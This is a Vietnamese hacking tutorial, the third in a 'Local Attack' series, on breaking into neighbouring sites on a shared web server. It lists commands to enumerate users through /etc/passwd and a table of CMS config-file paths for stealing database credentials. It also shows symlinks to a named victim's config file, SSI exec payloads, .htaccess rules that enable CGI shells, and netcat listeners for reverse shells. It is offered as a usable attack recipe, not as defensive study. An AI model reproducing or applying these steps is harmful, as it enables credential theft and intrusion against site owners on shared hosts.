Để hoàn thành bộ tut Local Attack full, hôm nay Soleil sẽ giới thiệu bài 3, cũng chính là bài quan trọng và trọng tâm nhất trong Local Attack. Trước khi đi vào bài 3, các bạn có thể đọc qua và lấy 1 số tool cần thiết từ bài 2 –Giới thiệu tính năng 1 số shell
* Nhắc lại trình tự các bước Local Attack
Cat /etc/passwd
Less /etc/passwd./cat/etc/passwdMore /etc/passwd
Cat /etc/virtual/domainowners ( Chỉ dùng đối với direct admin )
- Vbulletin:path/includes/config.php- Mybb:path/inc/config.php- Joomla:path/configuration.php- Word-Press:path/wp-config.php- Ibp:path/conf_global.php- Php-fusion:path/config.php- Smf:Path/Settings.php- Nuke:path/config.php- Xoops:path/mainfile.php- Zen CartPath/includes/configure.php- path/setidio:path/datas/config.php- Datalife Engine:path/engine/data/config.php- Phpbb:Path/config.php- WordPress:path/wp-config.php- Seditio:path/datas/config.php- Drupal:path/sites/default/settings.php
- Discuz
path/config/config_ucenter.php
- Bo-Blog
path/data/config.php
Forum.php -> global.php -> includes/class_bootstrap -> includes/init.php -> includes/class_core.php -> includes/config.php
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
Cd /home/vhbgroup/public_html/@4rum/includes/soleilcd ~ : Tới thư mục home dictionarycd -: Quay lại thư mục vừa làm việccd ..: Tới thư mục kề bên ngoài thư mục đang làm việc
Chmod 400 config.php ( đang làm việc trong thư mục includes chứa file config.php )
Mkdir /home/vhbgroup/public_html/@4rum/includes/soleil
touch /home/vhbgroup/public_html/@4rum/includes/soleil.php
Tar –zcvf ducdung08clc.tar.gz soleil ( Nén thư mục soleil thành file ducdung08clc.tar.gz)Tar –zxvf ducdung08clc.tar.gz ( giải nén file ducdung08clc.tar.gz)
Zip –r -9 ducdung08clc.zip soleil ( Nén thư mục soleil thành file ducdung08clc.zip)Zip -p ducdung08clc.zip ( Giải nén file ducdung.tar.gz)
dir /home/vhbgroup/public_html/includescat /home/vhbgroup/public_html/includes/config.php
Ln -s /home/vhbgroup/public_html/@4rum/includes/config.php soleil.ini
<!–#include virtual=”soleil.ini”–>
<!–#exec cmd=”cat /etc/passwd”–>
<!–#exec cmd=”tail -n 10000 /var/log/httpd/domains/vhbgroup.net.error.log”–>
Tar –zxvf r00t.tar.gz
Options allDirectoryIndex Sux.htmlAddType text/plain .phpAddHandler server-parsed .phpAddType text/plain .htmlAddHandler txt .htmlRequire NoneSatisfy Any
nc -nvv -l -p 80nc -lvvnp 3333nc -nvv -l -p 12345nc 127.0.0.1 7777nc -vv -l -p 7777nc -vlp 443
## START ##Options +ExecCGIAddHandler cgi-script cgi pl cgi gmc pin jpgRewriteEngine onRewriteRule (.*)\.mil$ $1.cgiOptions +FollowSymLinksDirectoryIndex cmd.htmlOptions +IndexesRemoveHandler .hackAddType text/plain .hack## milw0rmvn exploit ##Hoặc:Options FollowSymLinks MultiViews Indexes ExecCGIAddType application/x-httpd-cgi .cinAddHandler cgi-script .pinAddHandler cgi-script .pin
Trong bài tut trên soleil đã giới các phương pháp local attack cơ bản và các dạng bypass cơ bản nhất có thể sử dụng. Trong bài tiếp theo soleil sẽ đề cập đến các dạng bypass nâng cao đối với 1 số server khó, các thủ thuật vượt chmod qua 400 permission, chiếm quyền điều khiển root (get root) và các kỹ thuật up shell đối với 1 số mã nguồn mở như: joomla, worpress, nukeviet, vbulletin, drupal……